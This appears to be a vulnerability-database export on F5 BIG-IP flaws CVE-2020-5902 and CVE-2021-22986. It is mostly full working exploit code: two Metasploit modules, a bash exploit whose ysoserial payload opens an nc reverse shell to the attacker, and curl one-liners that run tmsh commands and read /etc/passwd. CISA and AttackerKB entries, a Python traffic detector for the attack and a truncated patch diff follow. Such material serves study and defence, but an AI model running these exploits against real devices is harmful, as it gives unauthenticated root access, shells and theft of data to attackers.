{\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'WfsDelay' => 5\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service\n 'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),\n 'vars_post' => {\n 'fileName' => '/etc/f5-release'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check 
request.')\n end\n\n unless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body\n return CheckCode::Safe('Target did not respond with BIG-IP version.')\n end\n\n # If we got here, the directory traversal was successful\n CheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\")\n end\n\n def exploit\n create_alias\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n\n delete_alias if @created_alias\n end\n\n def create_alias\n print_status('Creating alias list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'create cli alias private list command bash'\n }\n )\n\n unless res && res.code == 200 && res.get_json_document['error'].blank?\n fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')\n end\n\n @created_alias = true\n\n print_good('Successfully created alias list=bash')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n upload_script(cmd)\n execute_script\n end\n\n def upload_script(cmd)\n print_status(\"Uploading #{script_path}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),\n 'vars_post' => {\n 'fileName' => script_path,\n 'content' => cmd\n }\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\")\n end\n\n register_file_for_cleanup(script_path)\n\n print_good(\"Successfully uploaded #{script_path}\")\n end\n\n def execute_script\n print_status(\"Executing #{script_path}\")\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => \"list #{script_path}\"\n }\n }, 3.5)\n end\n\n def delete_alias\n print_status('Deleting alias 
list=bash')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),\n 'vars_post' => {\n 'command' => 'delete cli alias private list'\n }\n )\n\n unless res && res.code == 200 && res.get_json_document['error'].blank?\n print_warning('Failed to delete alias list=bash')\n return\n end\n\n print_good('Successfully deleted alias list=bash')\n end\n\n def dir_trav(path)\n # PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\">\n normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)\n end\n\n def script_path\n @script_path ||=\n normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34652", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-20T04:48:46", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34646", "href": "https://0day.today/exploit/description/34646", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial 
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. 
\\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-20T04:49:16", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "zdt", "title": "BIG-IP 15.0.0 < 15.1.0.3 - Traffic Management User Interface (TMUI) Remote Code Execution (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "1337DAY-ID-34647", "href": "https://0day.today/exploit/description/34647", "sourceData": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution\r\n\r\n## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'\n\n# 0day.today [2020-07-20] #", "sourceHref": "https://0day.today/exploit/34647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:37:41", "description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. 
CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T19:02:32", "type": "metasploit", "title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-06-03T01:32:47", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_REST_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rest_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 
'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF in the F5 iControl REST API's\n /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n can be used to execute root commands on an affected BIG-IP or BIG-IQ\n device. This vulnerability is known as CVE-2021-22986.\n\n CVE-2021-22986 affects the following BIG-IP versions:\n\n * 12.1.0 - 12.1.5\n * 13.1.0 - 13.1.3\n * 14.1.0 - 14.1.3\n * 15.1.0 - 15.1.2\n * 16.0.0 - 16.0.1\n\n And the following BIG-IQ versions:\n\n * 6.0.0 - 6.1.0\n * 7.0.0\n * 7.1.0\n\n Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n },\n 'Author' => [\n 'wvu', # Analysis and exploit\n 'Rich Warren' # First blood (RCE) and endpoint collaboration\n ],\n 'References' => [\n ['CVE', '2021-22986'],\n ['URL', 'https://support.f5.com/csp/article/K03009991'],\n ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n ],\n 'DisclosureDate' => '2021-03-10', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :bourne,\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 
```ruby
          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
          'SideEffects' => [
            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
            ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie
            ARTIFACTS_ON_DISK # CmdStager
          ]
        }
      )
    )

    register_options([
      Opt::RPORT(443),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),
      OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])
    ])

    register_advanced_options([
      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def user_reference_endpoint
    normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)
  end

  # The check is the exploit's first step: a target that hands out a token
  # for a password-less login is vulnerable.
  def check
    generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe
  end

  def exploit
    return unless (@token ||= generate_token_ssrf)

    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  # Step 1: POST to the login worker with no password, pointing loginReference
  # at an internal endpoint that answers without authentication; the response
  # carries a valid X-F5-Auth-Token for USERNAME.
  def generate_token_ssrf
    print_status('Generating token via SSRF...')
    vprint_status("Username: #{username}")
    vprint_status("Endpoint: #{login_reference_endpoint}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
      'ctype' => 'application/json',
      'data' => {
        'username' => username,
        'bigipAuthCookie' => '',
        'authProviderName' => 'local',
        'loginReference' => {
          'link' => "https://localhost#{login_reference_endpoint}"
        },
        'userReference' => {
          'link' => "https://localhost#{user_reference_endpoint}"
        }
      }.to_json
    )

    unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))
      print_error('Failed to generate token')
      return
    end

    print_good("Successfully generated token: #{@token}")
    @token
  end

  # Step 2: spend the token on /mgmt/tm/util/bash, which runs the supplied
  # shell command on the device. The command is base64-wrapped to sidestep
  # quoting inside utilCmdArgs.
  def execute_command(cmd, _opts = {})
    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"

    print_status("Executing command: #{bash_cmd}")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
      'ctype' => 'application/json',
      'headers' => {
        'X-F5-Auth-Token' => @token
      },
      'data' => {
        'command' => 'run',
        'utilCmdArgs' => "-c '#{bash_cmd}'"
      }.to_json
    }, datastore['CmdExecTimeout'])

    unless res
      print_warning('Command execution timed out')
      return
    end

    json = res.get_json_document

    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
      fail_with(Failure::PayloadFailed, 'Failed to execute command')
    end

    print_good('Successfully executed command')

    return unless (cmd_result = json['commandResult'])

    vprint_line(cmd_result)
  end

  # A user-supplied ENDPOINT wins; otherwise one known-good endpoint is picked
  # at random and reused for the rest of the run.
  def login_reference_endpoint
    if datastore['ENDPOINT']
      return normalize_uri(target_uri.path, datastore['ENDPOINT'])
    end

    @token_generation_endpoint ||= token_generation_endpoints.sample

    normalize_uri(target_uri.path, @token_generation_endpoint)
  end

  # Usable token generation endpoints between versions 12.1.4 and 16.0.1
  def token_generation_endpoints
    %w[
      /access/file-path-manager/indexing
      /cm/autodeploy/cluster-software-images/indexing
      /cm/autodeploy/qkview/indexing
      /cm/autodeploy/software-images/indexing
      /cm/autodeploy/software-volume-install/indexing
      /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing
      /cm/system/authn/providers/tmos/indexing
      /mgmt/shared/analytics/avr-proxy-tasks
      /mgmt/shared/gossip
      /mgmt/shared/gossip-peer-refresher
      /mgmt/shared/identified-devices/config/device-refresh
      /mgmt/shared/save-config
      /mgmt/tm/shared/bigip-failover-state
      /shared/analytics/avr-proxy-tasks
      /shared/analytics/avr-proxy-tasks/indexing
      /shared/analytics/event-aggregation-tasks/indexing
      /shared/analytics/event-analysis-tasks/indexing
      /shared/authn/providers/local/groups/indexing
      /shared/authz/remote-resources/indexing
      /shared/authz/resource-groups/indexing
      /shared/authz/roles/indexing
      /shared/authz/tokens/indexing
      /shared/chassis-framework-upgrades/indexing
      /shared/device-discovery-tasks/indexing
      /shared/device-group-key-pairs/indexing
      /shared/echo/indexing
      /shared/framework-info-tasks/indexing
      /shared/framework-upgrades/indexing
      /shared/gossip
      /shared/gossip-peer-refresher
      /shared/group-task/indexing
      /shared/iapp/blocks/indexing
      /shared/iapp/build-package/indexing
      /shared/iapp/health-prefix-map/indexing
      /shared/iapp/package-management-tasks/indexing
      /shared/iapp/template-loader/indexing
      /shared/identified-devices/config/device-refresh
      /shared/nodejs/loader-path-config/indexing
      /shared/package-deployments/indexing
      /shared/resolver/device-groups/indexing
      /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing
      /shared/root-framework-upgrades/indexing
      /shared/rpm-tasks/indexing
      /shared/save-config
      /shared/snapshot-task/indexing
      /shared/snapshot/indexing
      /shared/stats-information/indexing
      /shared/storage/tasks/indexing
      /shared/task-scheduler/scheduler/indexing
      /shared/tmsh-shell/indexing
      /tm/analytics/afm-sweeper/generate-report/indexing
      /tm/analytics/afm-sweeper/report-results/indexing
      /tm/analytics/application-security-anomalies/generate-report/indexing
      /tm/analytics/application-security-anomalies/report-results/indexing
      /tm/analytics/application-security-network/generate-report/indexing
      /tm/analytics/application-security-network/report-results/indexing
      /tm/analytics/application-security/generate-report/indexing
      /tm/analytics/application-security/report-results/indexing
      /tm/analytics/asm-bypass/generate-report/indexing
      /tm/analytics/asm-bypass/report-results/indexing
      /tm/analytics/asm-cpu/generate-report/indexing
      /tm/analytics/asm-cpu/report-results/indexing
      /tm/analytics/asm-memory/generate-report/indexing
      /tm/analytics/asm-memory/report-results/indexing
      /tm/analytics/cpu/generate-report/indexing
      /tm/analytics/cpu/report-results/indexing
      /tm/analytics/disk-info/generate-report/indexing
      /tm/analytics/disk-info/report-results/indexing
      /tm/analytics/dns/generate-report/indexing
      /tm/analytics/dns/report-results/indexing
      /tm/analytics/dos-l3/generate-report/indexing
      /tm/analytics/dos-l3/report-results/indexing
      /tm/analytics/http/generate-report/indexing
      /tm/analytics/http/report-results/indexing
      /tm/analytics/ip-intelligence/generate-report/indexing
      /tm/analytics/ip-intelligence/report-results/indexing
      /tm/analytics/ip-layer/generate-report/indexing
      /tm/analytics/ip-layer/report-results/indexing
      /tm/analytics/lsn-pool/generate-report/indexing
      /tm/analytics/lsn-pool/report-results/indexing
      /tm/analytics/memory/generate-report/indexing
      /tm/analytics/memory/report-results/indexing
      /tm/analytics/network/generate-report/indexing
      /tm/analytics/network/report-results/indexing
      /tm/analytics/pem/generate-report/indexing
      /tm/analytics/pem/report-results/indexing
      /tm/analytics/proc-cpu/generate-report/indexing
      /tm/analytics/proc-cpu/report-results/indexing
      /tm/analytics/protocol-security-http/generate-report/indexing
      /tm/analytics/protocol-security-http/report-results/indexing
      /tm/analytics/protocol-security/generate-report/indexing
      /tm/analytics/protocol-security/report-results/indexing
      /tm/analytics/sip/generate-report/indexing
      /tm/analytics/sip/report-results/indexing
      /tm/analytics/swg-blocked/generate-report/indexing
      /tm/analytics/swg-blocked/report-results/indexing
      /tm/analytics/swg/generate-report/indexing
      /tm/analytics/swg/report-results/indexing
      /tm/analytics/tcp-analytics/generate-report/indexing
      /tm/analytics/tcp-analytics/report-results/indexing
      /tm/analytics/tcp/generate-report/indexing
      /tm/analytics/tcp/report-results/indexing
      /tm/analytics/udp/generate-report/indexing
      /tm/analytics/udp/report-results/indexing
      /tm/analytics/vcmp/generate-report/indexing
      /tm/analytics/vcmp/report-results/indexing
      /tm/analytics/virtual/generate-report/indexing
      /tm/analytics/virtual/report-results/indexing
      /tm/shared/bigip-failover-state
      /tm/shared/sys/backup/indexing
    ]
  end

end
```

Source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb (CVSS v2 score 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C)

## CISA Known Exploited Vulnerabilities

**CISA-KEV-CVE-2021-22986** (published 2021-11-03; last seen 2022-08-10): F5 iControl REST unauthenticated Remote Code Execution Vulnerability. The iControl REST interface has an unauthenticated remote command execution vulnerability. CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9). CVSS v2: 10.0 HIGH, AV:N/AC:L/Au:N/C:C/I:C/A:C (exploitability 10.0, impact 10.0).
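The module above mints a token with a password-less POST to /mgmt/shared/authn/login whose loginReference link points back at one of the device's own unauthenticated workers, then spends that token on /mgmt/tm/util/bash. The detector below, added here as an example and not part of the Metasploit module or of any F5 or Rapid7 tooling, runs that two-step pattern over captured requests and ties the bash call to the login that produced its token. The capture format (dicts with method, path, headers, body and, where the recording proxy keeps it, response_body), the function names and the sample traffic are constructed for the example; the endpoint subset is copied from the module's token_generation_endpoints list.

```python
"""Flag the CVE-2021-22986 request pattern in captured iControl REST traffic (example)."""
import json
from urllib.parse import urlsplit

LOGIN_PATH = "/mgmt/shared/authn/login"
BASH_PATH = "/mgmt/tm/util/bash"
# Subset of the module's token_generation_endpoints: internal workers that answer
# without authentication, so a loginReference aimed at one of them is a red flag.
SSRF_TOKEN_ENDPOINTS = {
    "/mgmt/shared/gossip",
    "/mgmt/shared/gossip-peer-refresher",
    "/mgmt/shared/save-config",
    "/mgmt/shared/identified-devices/config/device-refresh",
    "/mgmt/tm/shared/bigip-failover-state",
}
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}


def _json_body(text):
    """Parse a JSON body; a missing or unparseable body counts as no body."""
    try:
        return json.loads(text or "")
    except ValueError:
        return None


def login_findings(req):
    """Reasons a /mgmt/shared/authn/login request looks like the SSRF token grab."""
    body = _json_body(req.get("body"))
    if not isinstance(body, dict):
        return []
    ref = body.get("loginReference")
    link = ref.get("link") if isinstance(ref, dict) else None
    if not isinstance(link, str):
        return []  # ordinary logins carry no loginReference at all
    reasons = []
    if "password" not in body:
        reasons.append("loginReference supplied without a password")
    parts = urlsplit(link)
    if parts.hostname in LOOPBACK_HOSTS:
        reasons.append("loginReference points back at the device itself")
    if parts.path in SSRF_TOKEN_ENDPOINTS or parts.path.endswith("/indexing"):
        reasons.append("loginReference targets unauthenticated worker " + parts.path)
    return reasons


def issued_token(req):
    """Token the login response handed out, if the capture includes the response."""
    resp = _json_body(req.get("response_body"))
    try:
        return resp["token"]["token"]
    except (KeyError, TypeError):
        return None


def bash_findings(req, tainted_tokens):
    """Reasons a /mgmt/tm/util/bash call looks like the module's command step."""
    body = _json_body(req.get("body"))
    if not isinstance(body, dict):
        return []
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    reasons = []
    if headers.get("x-f5-auth-token") in tainted_tokens:
        reasons.append("X-F5-Auth-Token was minted by an SSRF login")
    args = str(body.get("utilCmdArgs", ""))
    if "base64 -d" in args or "eval " in args:
        reasons.append("base64/eval wrapper in utilCmdArgs")
    return reasons


def detect(requests):
    """Walk requests in capture order and return (index, path, reasons) per hit."""
    tainted, hits = set(), []  # tokens handed to suspicious logins; findings
    for i, req in enumerate(requests):
        if str(req.get("method", "")).upper() != "POST":
            continue
        if req.get("path") == LOGIN_PATH:
            reasons = login_findings(req)
            if reasons:
                token = issued_token(req)
                if token:
                    tainted.add(token)  # ties the later util/bash call to this login
                hits.append((i, LOGIN_PATH, reasons))
        elif req.get("path") == BASH_PATH:
            reasons = bash_findings(req, tainted)
            if reasons:
                hits.append((i, BASH_PATH, reasons))
    return hits


# Constructed sample capture: a normal login and bash call, then the two
# requests the module sends (token values are made up).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": LOGIN_PATH, "headers": {},
     "body": json.dumps({"username": "admin", "password": "hunter2", "loginProviderName": "tmos"}),
     "response_body": json.dumps({"token": {"token": "LEGITTOKEN"}})},
    {"method": "POST", "path": LOGIN_PATH, "headers": {},
     "body": json.dumps({"username": "admin", "bigipAuthCookie": "", "authProviderName": "local",
                         "loginReference": {"link": "https://localhost/mgmt/shared/gossip"},
                         "userReference": {"link": "https://localhost/mgmt/shared/authz/users/admin"}}),
     "response_body": json.dumps({"token": {"token": "SSRFTOKEN"}})},
    {"method": "POST", "path": BASH_PATH, "headers": {"X-F5-Auth-Token": "SSRFTOKEN"},
     "body": json.dumps({"command": "run", "utilCmdArgs": "-c 'eval $(echo aWQ= | base64 -d)'"})},
    {"method": "POST", "path": BASH_PATH, "headers": {"X-F5-Auth-Token": "LEGITTOKEN"},
     "body": json.dumps({"command": "run", "utilCmdArgs": "-c 'tmsh show sys version'"})},
]
```

Running `detect(SAMPLE_REQUESTS)` reports the second and third records only: the password-less login with a loopback loginReference (three reasons) and the bash call that spends the token it received. The legitimate login and the routine tmsh call are left alone. Without response bodies the token correlation degrades to the utilCmdArgs heuristic, so capture responses on the management interface where you can; a loginReference in any login body is worth alerting on regardless of its target, since normal clients never send one.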
**CISA-KEV-CVE-2020-5902** (published 2021-11-03; last seen 2022-08-10): F5 BIG-IP Traffic Management User Interface Remote Code Execution Vulnerability. In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (exploitability 3.9, impact 5.9). CVSS v2: 10.0 HIGH, AV:N/AC:L/Au:N/C:C/I:C/A:C (exploitability 10.0, impact 10.0).

## AttackerKB

**CVE-2021-22986** (last seen 2022-04-22): On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability.
Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.

**Recent assessments:**

**wvu-r7** at March 14, 2021 10:18am UTC reported:

# CVE-2021-22986

_This writeup has been updated to thoroughly reflect my findings and those of the community. Thank you!_

[This vulnerability](<https://support.f5.com/csp/article/K03009991>) appears to involve some kind of auth bypass or even SSRF, judging by my patch analysis and testing. The full-context patch below has its line numbers adjusted for use in a debugger.

diff --git a/com/f5/rest/app/RestServerServlet.java b/com/f5/rest/app/RestServerServlet.java\n index 9cd36e1..c0c67d6 100644\n --- a/com/f5/rest/app/RestServerServlet.java\n +++ b/com/f5/rest/app/RestServerServlet.java\n 
@@ -1,538 +1,539 @@\n package com.f5.rest.app;\n \n import com.f5.rest.common.ByteUnit;\n import com.f5.rest.common.HttpParserHelper;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestLogger;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestOperationIdentifier;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorkerUriNotFoundException;\n import java.io.ByteArrayOutputStream;\n import java.io.IOException;\n import java.net.URI;\n import java.net.URISyntaxException;\n import java.nio.charset.StandardCharsets;\n import java.util.Enumeration;\n import java.util.HashMap;\n import java.util.Map;\n import java.util.logging.Level;\n import java.util.logging.Logger;\n import javax.servlet.AsyncContext;\n import javax.servlet.ReadListener;\n import javax.servlet.ServletException;\n import javax.servlet.ServletInputStream;\n import javax.servlet.ServletOutputStream;\n import javax.servlet.WriteListener;\n import javax.servlet.http.HttpServlet;\n import javax.servlet.http.HttpServletRequest;\n import javax.servlet.http.HttpServletResponse;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RestServerServlet\n extends HttpServlet\n {\n private static final long serialVersionUID = -6003011105634738728L;\n private static final int BUFFER_SIZE = (int)ByteUnit.KILOBYTES.toBytes(8L);\n private Logger logger = RestLogger.getLogger(RestServerServlet.class.getName());\n \n \n \n private static void failRequest(AsyncContext context, RestOperation operation, Throwable t, int httpStatusCode) {\n if (operation.generateRestErrorResponse()) {\n operation.setErrorResponseBody(t);\n }\n \n operation.setStatusCode(httpStatusCode);\n sendRestOperation(context, operation);\n }\n \n private static void sendRestOperation(AsyncContext context, RestOperation operation) {\n try {\n writeResponseHeadersFromRestOperation(operation, 
